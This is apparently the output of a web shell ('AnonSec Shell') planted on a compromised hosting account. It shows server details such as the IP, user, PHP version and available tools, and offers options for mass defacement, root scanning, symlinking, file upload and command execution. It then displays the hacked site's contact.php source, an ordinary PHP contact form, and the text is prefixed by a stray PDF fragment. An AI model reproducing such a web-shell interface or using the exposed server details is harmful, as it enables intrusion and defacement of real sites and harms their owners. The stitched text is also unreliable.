%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.216.24   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/public_html/contact.php
<?php
	include('lib/include.php');

	$contact_text_result = $ceha->query("SELECT * FROM tbl_contact_text WHERE id='1' AND active='1'");
	$contact_text = $contact_text_result->fetch_array();

	$address_result = $ceha->query("SELECT * FROM tbl_address WHERE active='1'");

	include('header.php');
?>
	 
    <main id="content" class="bg-white">
        <section class="ptb--30 bg-color-2 text-center">
            <div class="container">
				<h2><?php echo $variable[5]; ?></h2>
                <nav aria-label="breadcrumb">
                    <ol class="breadcrumb py-0 justify-content-center">
                        <li class="breadcrumb-item"><a href="<?php echo $page_url[1]; ?>"><?php echo $variable[18]; ?></a></li>
                        <li class="breadcrumb-item active" aria-current="page"><?php echo $variable[5]; ?></li>
                    </ol>
                </nav>
            </div>
        </section>
        <div class="pt-10 pb-8 pb-md-10">
            <div class="container">
				
                <div class="col-sm-6 offset-sm-3 text-center">
					
                	<h1 class="mb-2"><?php echo $contact_text['title_'.$lang]; ?></h1>
					<?php echo $contact_text['content_'.$lang]; ?>
                    <b><p id="contact-return"></p></b>
					
				</div>
				
                <div class="row">
                    <div class="col-md-10 mx-auto">
                        <form class="contact-form text-center" id="contact-form">
                            <div class="row mb-6">
                                <div class="col-sm-6"><input id="contact-name" type="text" class="form-control mb-6" placeholder="<?php echo $variable[22]; ?>*" required></div>
                                <div class="col-sm-6"><input id="contact-mail" type="email" class="form-control mb-6" placeholder="<?php echo $variable[17]; ?>*" required></div>
                                <div class="col-sm-12"><input id="contact-subject" type="text" class="form-control" placeholder="<?php echo $variable[23]; ?>" required></div>
                            </div>
                            <div class="form-group mb-4"><textarea id="contact-message" class="form-control" rows="6" placeholder="<?php echo $variable[24]; ?>"></textarea></div>
                            <button type="submit" class="btn btn-primary"><?php echo $variable[25]; ?></button>
                        </form>
                    </div>
                </div>
            </div>
        </div>
		<?php while($address = $address_result->fetch_array()){ ?>
        <section class="pt-10">
            <div class="container">
				<h3 class="mb-5 text-center address-title"><?php echo $address['title']; ?></h3>
                <div class="row justify-content-center">
					<div class="col-sm-10">
						<div class="address-block">
							<div class="row address-bar">
								<div class="col-sm-12 col-md-12 col-lg-4 mb-6 mb-md-0">
									<div class="px-5">
										<p class="font-weight-bold text-primary mb-2"><span class="d-inline-block mr-1"><i class="fas fa-map-marked-alt"></i></span> <?php echo $variable[26]; ?></p>
										<p class="mb-2 pl--20"><?php echo $address['address']; ?></p>
									</div>
								</div>
								<div class="col-sm-12 col-md-12 col-lg-4 mb-6 mb-md-0">
									<div class="px-5">
										<p class="font-weight-bold text-primary mb-2"><span class="d-inline-block mr-1"><i class="fas fa-envelope"></i></span> <?php echo $variable[17]; ?></p>
										<p class="mb-0 pl--20"><?php echo $address['email1']; ?></p>
										<p class="mb-0 pl--20"><?php echo $address['email2']; ?></p>
									</div>
								</div>
								<div class="col-sm-12 col-md-12 col-lg-4 mb-6 mb-md-0">
									<div class="px-5">
										<p class="font-weight-bold text-primary mb-2"><span class="d-inline-block mr-1"><i class="fas fa-phone"></i></span> <?php echo $variable[16]; ?> & <?php echo $variable[27]; ?></p>
										<p class="mb-0 pl--20"><?php echo $address['phone']; ?></p>
										<p class="mb-0 pl--20"><?php echo $address['fax']; ?></p>
									</div>
								</div>
							</div>
						</div>
					</div>
                </div>
            </div>
        </section>
        <section class="pb-10">
            <div class="container container-xxl">
               <?php echo $address['map_url']; ?>
            </div>
        </section>
		<?php } ?>
		
    </main>


<?php include('footer.php'); ?>
<script>
    $(document).ready(function(){
        $("#contact-form").on("submit", function(event){
            event.preventDefault();

            var name = document.getElementById('contact-name').value;
            var mail = document.getElementById('contact-mail').value;
            var subject = document.getElementById('contact-subject').value;
            var message = document.getElementById('contact-message').value;

            console.log(name+mail+subject+message);

            var url = "../inc/mail.php?name="+name+"&mail="+mail+"&subject="+subject+"&message="+message+"&status=2";
            $.ajax({
                type: "GET",
                url: url,
                // dataType: 'json',

                success: function(data) {

                    const obj = JSON.parse(data);
                    console.log(obj.status);

                    if(obj.status == 0){

                        document.getElementById("contact-return").innerHTML ="Mesajınız şuan gönderilemiyor. Lütfen daha sonra tekrar deneyin.";
                    }
                    else if(obj.status == 1){
                        document.getElementById("contact-return").innerHTML ="Mesajınız gönderilmiştir. En kısa sürede dönüş sağlanacaktır.";
                    }

                },
  error: function(jqXHR, textStatus, errorThrown) {
    // Handle the error
    console.error('Error:', textStatus, errorThrown);
    // Show the error message on the page or display it in an alert
    document.getElementById("contact-return").innerHTML = "Hata oluştu: " + textStatus + " - " + errorThrown;
  }
            });

        });
    })


</script>


Anon7 - 2022
AnonSec Team